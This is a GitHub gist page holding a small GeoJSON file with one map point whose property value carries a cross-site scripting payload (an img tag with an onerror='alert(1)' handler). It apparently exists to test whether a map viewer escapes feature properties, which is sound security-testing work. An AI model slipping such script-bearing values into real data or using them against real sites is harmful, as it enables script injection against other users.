Skip to content

Instantly share code, notes, and snippets.

@anglinb
Created August 7, 2019 22:50
Show Gist options
  • Select an option

  • Save anglinb/1361525d4d0ae7b60633da8e1973adb3 to your computer and use it in GitHub Desktop.

Select an option

Save anglinb/1361525d4d0ae7b60633da8e1973adb3 to your computer and use it in GitHub Desktop.
Display the source blob
Display the rendered blob
Raw
{
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {"test_key":"test_value<img onerror='alert(1)' src='https://injected'>"},
"geometry": {
"type": "Point",
"coordinates": [-73.984524, 40.759152]
}
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment